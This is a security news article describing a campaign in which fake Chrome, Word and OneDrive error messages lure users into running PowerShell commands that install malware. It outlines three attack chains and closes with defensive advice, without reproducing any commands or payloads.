Fake Chrome Errors Install Malware via PowerShell Scripts

A recent malware campaign employs deceptive error messages from Google Chrome, Word, and OneDrive to trick users into executing malicious PowerShell scripts that install malware.

This campaign has been linked to various threat actors, including ClearFake, a new attack cluster called ClickFix, and TA571, known for large-scale email spam leading to malware and ransomware infections.

Historically, ClearFake attacks used website overlays prompting users to install fake browser updates that delivered malware. In the current campaign, attackers display fake error messages from Google Chrome, Microsoft Word, and OneDrive, prompting users to copy and run a PowerShell “fix” from their clipboard.

T8he clever social engineering tactics used in this campaign. The fake error messages present users with seemingly legitimate problems and solutions, prompting them to act without fully considering the risks.

The malware payloads include DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and Lumma Stealer. Three distinct attack chains were identified, differing mainly in their initial stages, with the first not conclusively linked to TA571.

In the first attack chain, associated with ClearFake, users visit a compromised website that loads a malicious script hosted on Binance’s Smart Chain contracts.

This script displays a fake Google Chrome warning, prompting users to install a “root certificate” by running a PowerShell script. Once executed, the script confirms the device is a valid target, flushes the DNS cache, removes clipboard content, displays a decoy message, and downloads additional payloads, including info-stealers.

The second attack chain, linked to the ClickFix campaign, involves compromised websites that inject an iframe overlay displaying another fake Google Chrome error. Users are instructed to open “Windows PowerShell (Admin)” and run the provided code, leading to the same infections.

The third attack chain uses email-based infections with HTML attachments resembling Microsoft Word documents. Users are prompted to install the “Word Online” extension.

The error message provides “How to fix” and “Auto-fix” options, with “How to fix” copying a base64-encoded PowerShell command to the clipboard, and “Auto-fix” displaying a WebDAV-hosted file. Executing these commands downloads and runs MSI or VBS files, resulting in Matanbuchus or DarkGate infections.

In all scenarios, the attackers exploit users’ lack of awareness about the risks of running PowerShell commands and Windows’ inability to detect and block the malicious actions initiated by the pasted code. The variety in attack chains demonstrates TA571’s ongoing experimentation with different methods to enhance their effectiveness and expand infection pathways, targeting more systems.

To prevent falling victim to malware campaigns that use fake Chrome errors and PowerShell scripts, users should be educated on recognizing phishing attempts and suspicious error messages. Utilize browser security extensions that block malicious sites and attachments. Employ advanced email filtering and endpoint protection solutions to detect and block malicious activities before they cause harm.